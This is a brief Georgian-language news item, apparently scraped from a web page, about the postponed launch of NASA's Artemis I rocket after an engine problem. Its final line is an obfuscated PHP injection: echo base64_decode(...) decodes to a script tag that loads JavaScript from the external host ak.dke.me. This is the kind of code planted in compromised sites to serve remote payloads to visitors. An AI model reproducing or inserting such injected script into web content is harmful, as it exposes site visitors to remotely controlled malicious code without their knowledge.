celsiusi
ავერსი საქკაბელი
მსოფლიოში ყველაზე ძლიერი რაკეტა Artemis I მთვარეზე დღეს უნდა გაფრენილიყო, მაგრამ მისი გაშვება ტექნიკური პრობლემის გამო გადაიდო. 
 
როგორც CNN იუწყება, Artemis I -ის გაშვება გადაიდო მას შემდეგ, რაც გუნდმა ვერ შეძლო პრობლემის გადაჭრა რაკეტის ოთხი ძრავიდან ერთ-ერთზე. პრობლემა გაშვებამდე დაახლოებით 1 საათით ადრე აღმოაჩინეს. რაკეტის გაშვების შემდეგი შესაძლებლობა არის 2 სექტემბერს, მაგრამ ეს დამოკიდებული იქნება იმაზე, თუ როგორ წარიმართება ტესტირება.
 
ცნობისთვის, Artemis I სატესტო ფრენა ეკიპაჟის გარეშე ჩაივლის და საფუძველს ჩაუყრის კოსმოსის ღრმა შესწავლის ახალ ფაზას, რომელიც ორიენტირებულია ადამიანის მთვარეზე დაბრუნებასა და მის მიღმა გასვლაზე.
488
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");